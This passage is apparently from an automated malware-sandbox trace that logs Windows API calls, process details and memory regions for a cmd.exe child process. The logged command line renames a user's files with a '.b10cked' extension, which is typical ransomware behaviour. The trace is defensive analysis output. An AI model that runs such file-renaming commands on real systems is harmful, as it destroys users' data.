_String2="CD") returned 8 [0204.307] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.307] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.307] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.307] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.307] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.307] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.307] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.307] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.307] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5f8, lpFilePart=0x12f5f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5f4*="Desktop") returned 0x18 [0204.307] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.307] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f374 | out: lpFindFileData=0x12f374) returned 0x270010 [0204.307] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0204.308] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f374 | out: lpFindFileData=0x12f374) returned 0x270010 [0204.308] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0204.308] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f374 | out: lpFindFileData=0x12f374) returned 0x270010 [0204.308] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0204.308] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.308] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.308] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.308] GetEnvironmentStringsW () returned 0x272af0* [0204.309] FreeEnvironmentStringsW (penv=0x272af0) returned 1 [0204.309] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.309] GetConsoleOutputCP () returned 0x1b5 [0204.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.309] GetUserDefaultLCID () returned 0x409 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f738, cchData=128 | out: lpLCData="0") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f738, cchData=128 | out: lpLCData="0") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f738, cchData=128 | out: lpLCData="1") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.310] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.311] GetConsoleTitleW (in: lpConsoleTitle=0x2608e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.675] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.675] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.675] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.676] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.676] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.676] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.676] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.676] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.676] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.676] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.680] GetConsoleTitleW (in: lpConsoleTitle=0x12f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.898] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.898] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.898] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.898] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.898] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.898] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.898] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.898] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.898] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.898] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.899] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.899] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.899] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.899] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.899] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.899] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.899] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.899] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.899] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.899] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.899] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.899] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.899] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.899] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.899] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.899] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.899] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.899] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.899] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.900] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.900] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.900] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.900] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.900] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.900] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.902] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f1ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f1e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f1e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.902] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.902] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.905] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.906] _wcsicmp (_String1="MSOUTL~1.HXN", _String2=".") returned 63 [0204.906] _wcsicmp (_String1="MSOUTL~1.HXN", _String2="..") returned 63 [0204.906] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~1.hxn")) returned 0x2022 [0204.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.906] SetErrorMode (uMode=0x0) returned 0x0 [0204.906] SetErrorMode (uMode=0x1) returned 0x0 [0204.907] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", nBufferLength=0x104, lpBuffer=0x12eb74, lpFilePart=0x12eb5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", lpFilePart=0x12eb5c*="MSOUTL~1.HXN") returned 0x27 [0204.907] SetErrorMode (uMode=0x0) returned 0x1 [0204.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.907] _wcsicmp (_String1="MSOUTL~1.HXN", _String2=".") returned 63 [0204.907] _wcsicmp (_String1="MSOUTL~1.HXN", _String2="..") returned 63 [0204.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~1.hxn")) returned 0x2022 [0204.908] SetErrorMode (uMode=0x0) returned 0x0 [0204.908] SetErrorMode (uMode=0x1) returned 0x0 [0204.908] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", nBufferLength=0x104, lpBuffer=0x12eff0, lpFilePart=0x12ed88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", lpFilePart=0x12ed88*="MSOUTL~1.HXN") returned 0x27 [0204.908] SetErrorMode (uMode=0x0) returned 0x1 [0204.908] SetErrorMode (uMode=0x0) returned 0x0 [0204.908] SetErrorMode (uMode=0x1) returned 0x0 [0204.908] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f1f8, lpFilePart=0x12ed88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked", lpFilePart=0x12ed88*="MS.OUTLOOK.14.1033.hxn.b10cked") returned 0x39 [0204.908] SetErrorMode (uMode=0x0) returned 0x1 [0204.908] SetLastError (dwErrCode=0x0) [0204.908] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.outlook.14.1033.hxn.b10cked")) returned 0xffffffff [0204.908] GetLastError () returned 0x2 [0204.908] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e704, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e704) returned 0x260e70 [0204.908] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x12e704 | out: lpFindFileData=0x12e704) returned 0 [0204.909] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.909] GetLastError () returned 0x12 [0204.910] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e704, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e704) returned 0x260e70 [0204.910] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x12e704 | out: lpFindFileData=0x12e704) returned 0 [0204.910] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.910] GetLastError () returned 0x12 [0204.911] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x271be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271be0) returned 0x260e70 [0204.911] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x271be0 | out: lpFindFileData=0x271be0) returned 0 [0204.912] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.912] GetLastError () returned 0x12 [0204.912] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x271be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271be0) returned 0x260e70 [0204.912] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x271be0 | out: lpFindFileData=0x271be0) returned 0 [0204.912] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.912] GetLastError () returned 0x12 [0204.912] _get_osfhandle (_FileHandle=2) returned 0xb [0204.912] GetFileType (hFile=0xb) returned 0x2 [0204.912] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.912] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12e8d4 | out: lpMode=0x12e8d4) returned 1 [0204.913] _get_osfhandle (_FileHandle=2) returned 0xb [0204.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12e908 | out: lpConsoleScreenBufferInfo=0x12e908) returned 1 [0204.913] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.914] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12e948 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.914] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12e92c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12e92c*=0x2c) returned 1 [0204.915] longjmp () [0204.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.915] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.915] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.915] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.915] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.916] SetConsoleInputExeNameW () returned 0x1 [0204.916] GetConsoleOutputCP () returned 0x1b5 [0204.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.916] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.916] exit (_Code=1) Process: id = "473" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29316 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29317 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29318 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29319 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29320 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29321 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29322 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29323 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29324 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29325 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29686 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29687 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29688 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 29689 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29690 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29691 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29692 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29693 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29694 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29695 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29696 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29697 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29698 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29699 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29700 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29701 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29702 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29703 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29704 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 29705 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29706 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 29707 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 29708 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 29709 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 29975 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 670 os_tid = 0xe4c [0202.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f96c | out: lpSystemTimeAsFileTime=0x18f96c*(dwLowDateTime=0xad4555c0, dwHighDateTime=0x1d440a9)) [0202.099] GetCurrentProcessId () returned 0xf50 [0202.099] GetCurrentThreadId () returned 0xe4c [0202.099] GetTickCount () returned 0x390c9 [0202.099] QueryPerformanceCounter (in: lpPerformanceCount=0x18f964 | out: lpPerformanceCount=0x18f964*=25888790207) returned 1 [0202.099] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.099] __set_app_type (_Type=0x1) [0202.099] __p__fmode () returned 0x76b331f4 [0202.099] __p__commode () returned 0x76b331fc [0202.099] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.099] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.100] GetCurrentThreadId () returned 0xe4c [0202.100] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe4c) returned 0x38 [0202.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.100] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.100] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.100] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.100] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8fc | out: phkResult=0x18f8fc*=0x0) returned 0x2 [0202.100] VirtualQuery (in: lpAddress=0x18f933, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x90000, 